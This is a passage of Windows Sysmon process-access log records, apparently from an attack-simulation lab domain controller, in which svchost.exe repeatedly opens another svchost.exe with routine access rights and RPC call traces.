C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 